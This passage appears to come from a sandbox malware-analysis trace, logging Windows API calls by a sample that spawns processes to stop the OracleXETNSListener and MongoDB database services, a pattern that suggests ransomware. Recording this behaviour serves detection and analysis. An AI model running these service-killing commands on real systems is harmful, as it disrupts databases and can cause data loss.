lpNumberOfCharsWritten=0x18f9cc*=0x2) returned 1 [0065.298] _ultow (in: _Dest=0x889, _Radix=1636860 | out: _Dest=0x889) returned="2185" [0065.298] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ed0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xdab338, nSize=0x800, Arguments=0xda9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0065.298] GetFileType (hFile=0xb) returned 0x2 [0065.299] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f9b8 | out: lpMode=0x18f9b8) returned 1 [0065.299] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xdab338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f9d8, lpReserved=0x0 | out: lpBuffer=0xdab338*, lpNumberOfCharsWritten=0x18f9d8*=0x34) returned 1 [0065.299] GetFileType (hFile=0xb) returned 0x2 [0065.299] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f9b8 | out: lpMode=0x18f9b8) returned 1 [0065.299] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xd916cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f9d8, lpReserved=0x0 | out: lpBuffer=0xd916cc*, lpNumberOfCharsWritten=0x18f9d8*=0x2) returned 1 [0065.300] NetApiBufferFree (Buffer=0x681c18) returned 0x0 [0065.300] NetApiBufferFree (Buffer=0x681c30) returned 0x0 [0065.300] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleXETNSListener" [0065.300] exit (_Code=2) Process: id = "34" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1fb8f000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop MongoDB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0x960 [0069.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x37fed0 | out: lpSystemTimeAsFileTime=0x37fed0*(dwLowDateTime=0x98000f70, dwHighDateTime=0x1d57b18)) [0069.047] GetCurrentProcessId () returned 0x8d4 [0069.047] GetCurrentThreadId () returned 0x960 [0069.047] GetTickCount () returned 0x114b3a6 [0069.047] QueryPerformanceCounter (in: lpPerformanceCount=0x37fec8 | out: lpPerformanceCount=0x37fec8*=18926827847) returned 1 [0069.048] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0069.048] __set_app_type (_Type=0x1) [0069.048] __p__fmode () returned 0x74eb31f4 [0069.048] __p__commode () returned 0x74eb31fc [0069.048] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0069.048] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0069.048] GetCurrentThreadId () returned 0x960 [0069.048] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x960) returned 0x60 [0069.048] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.049] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0069.049] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.049] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.049] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x37fe60 | out: phkResult=0x37fe60*=0x0) returned 0x2 [0069.049] VirtualQuery (in: lpAddress=0x37fe97, lpBuffer=0x37fe30, dwLength=0x1c | out: lpBuffer=0x37fe30*(BaseAddress=0x37f000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.049] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x37fe30, dwLength=0x1c | out: lpBuffer=0x37fe30*(BaseAddress=0x280000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0069.049] VirtualQuery (in: lpAddress=0x281000, lpBuffer=0x37fe30, dwLength=0x1c | out: lpBuffer=0x37fe30*(BaseAddress=0x281000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0069.049] VirtualQuery (in: lpAddress=0x283000, lpBuffer=0x37fe30, dwLength=0x1c | out: lpBuffer=0x37fe30*(BaseAddress=0x283000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.049] VirtualQuery (in: lpAddress=0x380000, lpBuffer=0x37fe30, dwLength=0x1c | out: lpBuffer=0x37fe30*(BaseAddress=0x380000, AllocationBase=0x380000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0069.049] GetConsoleOutputCP () returned 0x1b5 [0069.049] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.050] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0069.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.050] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0069.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.050] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.050] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.050] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0069.051] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.051] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0069.051] GetEnvironmentStringsW () returned 0x7f2030* [0069.051] GetProcessHeap () returned 0x7e0000 [0069.051] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xaca) returned 0x7f2b08 [0069.051] FreeEnvironmentStringsW (penv=0x7f2030) returned 1 [0069.051] GetProcessHeap () returned 0x7e0000 [0069.051] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x4) returned 0x7f0c60 [0069.051] GetEnvironmentStringsW () returned 0x7f2030* [0069.051] GetProcessHeap () returned 0x7e0000 [0069.051] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xaca) returned 0x7f35e0 [0069.052] FreeEnvironmentStringsW (penv=0x7f2030) returned 1 [0069.052] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37edd0 | out: phkResult=0x37edd0*=0x68) returned 0x0 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x0, lpData=0x37eddc*=0x0, lpcbData=0x37edd4*=0x1000) returned 0x2 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x4, lpData=0x37eddc*=0x1, lpcbData=0x37edd4*=0x4) returned 0x0 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x0, lpData=0x37eddc*=0x1, lpcbData=0x37edd4*=0x1000) returned 0x2 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x4, lpData=0x37eddc*=0x0, lpcbData=0x37edd4*=0x4) returned 0x0 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x4, lpData=0x37eddc*=0x40, lpcbData=0x37edd4*=0x4) returned 0x0 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x4, lpData=0x37eddc*=0x40, lpcbData=0x37edd4*=0x4) returned 0x0 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x0, lpData=0x37eddc*=0x40, lpcbData=0x37edd4*=0x1000) returned 0x2 [0069.052] RegCloseKey (hKey=0x68) returned 0x0 [0069.052] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37edd0 | out: phkResult=0x37edd0*=0x68) returned 0x0 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x0, lpData=0x37eddc*=0x40, lpcbData=0x37edd4*=0x1000) returned 0x2 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x4, lpData=0x37eddc*=0x1, lpcbData=0x37edd4*=0x4) returned 0x0 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x0, lpData=0x37eddc*=0x1, lpcbData=0x37edd4*=0x1000) returned 0x2 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x4, lpData=0x37eddc*=0x0, lpcbData=0x37edd4*=0x4) returned 0x0 [0069.052] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x4, lpData=0x37eddc*=0x9, lpcbData=0x37edd4*=0x4) returned 0x0 [0069.053] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x4, lpData=0x37eddc*=0x9, lpcbData=0x37edd4*=0x4) returned 0x0 [0069.053] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37edd8, lpData=0x37eddc, lpcbData=0x37edd4*=0x1000 | out: lpType=0x37edd8*=0x0, lpData=0x37eddc*=0x9, lpcbData=0x37edd4*=0x1000) returned 0x2 [0069.053] RegCloseKey (hKey=0x68) returned 0x0 [0069.053] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0069.053] srand (_Seed=0x5d97ebb3) [0069.053] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop MongoDB" [0069.053] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop MongoDB" [0069.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.053] GetProcessHeap () returned 0x7e0000 [0069.053] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x210) returned 0x7f2030 [0069.053] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7f2038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.053] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.053] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.053] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.053] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.053] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.054] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.054] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.054] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.054] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.054] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.054] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.054] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.054] GetProcessHeap () returned 0x7e0000 [0069.054] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f2b08 | out: hHeap=0x7e0000) returned 1 [0069.054] GetEnvironmentStringsW () returned 0x7f2248* [0069.054] GetProcessHeap () returned 0x7e0000 [0069.054] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xae2) returned 0x7f4ba8 [0069.054] FreeEnvironmentStringsW (penv=0x7f2248) returned 1 [0069.054] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.054] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.054] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.054] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.054] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.054] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.054] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.054] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.054] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.054] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.054] GetProcessHeap () returned 0x7e0000 [0069.054] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x54) returned 0x7f5698 [0069.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x37fb9c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x37fb9c, lpFilePart=0x37fb98 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37fb98*="Desktop") returned 0x25 [0069.055] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.055] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x37f918 | out: lpFindFileData=0x37f918*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7f1eb0 [0069.055] FindClose (in: hFindFile=0x7f1eb0 | out: hFindFile=0x7f1eb0) returned 1 [0069.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x37f918 | out: lpFindFileData=0x37f918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x7f1eb0 [0069.055] FindClose (in: hFindFile=0x7f1eb0 | out: hFindFile=0x7f1eb0) returned 1 [0069.055] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x37f918 | out: lpFindFileData=0x37f918*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7f1eb0 [0069.055] FindClose (in: hFindFile=0x7f1eb0 | out: hFindFile=0x7f1eb0) returned 1 [0069.055] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.055] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.056] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.056] GetProcessHeap () returned 0x7e0000 [0069.056] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f4ba8 | out: hHeap=0x7e0000) returned 1 [0069.056] GetEnvironmentStringsW () returned 0x7f40b8* [0069.056] GetProcessHeap () returned 0x7e0000 [0069.056] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb36) returned 0x7f5ef8 [0069.056] FreeEnvironmentStringsW (penv=0x7f40b8) returned 1 [0069.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.056] GetProcessHeap () returned 0x7e0000 [0069.056] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f5698 | out: hHeap=0x7e0000) returned 1 [0069.056] GetProcessHeap () returned 0x7e0000 [0069.056] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x400e) returned 0x7f6a38 [0069.056] GetProcessHeap () returned 0x7e0000 [0069.056] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x2e) returned 0x7f1eb0 [0069.056] GetProcessHeap () returned 0x7e0000 [0069.056] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f6a38 | out: hHeap=0x7e0000) returned 1 [0069.056] GetConsoleOutputCP () returned 0x1b5 [0069.545] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.545] GetUserDefaultLCID () returned 0x409 [0069.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x37fcdc, cchData=128 | out: lpLCData="0") returned 2 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x37fcdc, cchData=128 | out: lpLCData="0") returned 2 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x37fcdc, cchData=128 | out: lpLCData="1") returned 2 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.547] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.547] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.549] GetProcessHeap () returned 0x7e0000 [0069.549] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20c) returned 0x7f2dc0 [0069.549] GetConsoleTitleW (in: lpConsoleTitle=0x7f2dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.549] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.549] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.549] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.550] GetProcessHeap () returned 0x7e0000 [0069.550] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x400a) returned 0x7f6a38 [0069.550] GetProcessHeap () returned 0x7e0000 [0069.550] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x7f6a38 | out: hHeap=0x7e0000) returned 1 [0069.550] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.550] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.550] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.550] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.550] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.550] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.550] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.550] GetProcessHeap () returned 0x7e0000 [0069.551] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x58) returned 0x7f2fd8 [0069.551] GetProcessHeap () returned 0x7e0000 [0069.551] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x10) returned 0x7eff00 [0069.551] GetProcessHeap () returned 0x7e0000 [0069.551] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x24) returned 0x7f3038 [0069.552] GetConsoleTitleW (in: lpConsoleTitle=0x37f9d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.552] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.552] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.552] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.552] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.552] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.552] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.552] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.552] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.552] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.552] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.552] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.552] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.552] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.552] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.552] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.552] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.552] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.552] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.552] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.552] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.552] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.552] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.552] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.552] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.553] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.553] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.553] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.553] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.553] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.553] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.553] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.553] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.553] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.553] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.553] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.553] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.553] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.553] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.553] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.553] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.553] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.553] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.553] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.553] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.553] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.553] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.553] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.553] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.553] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.553] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.553] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.553] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.553] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.553] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.553] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.553] _wcsicmp (_String1="net", 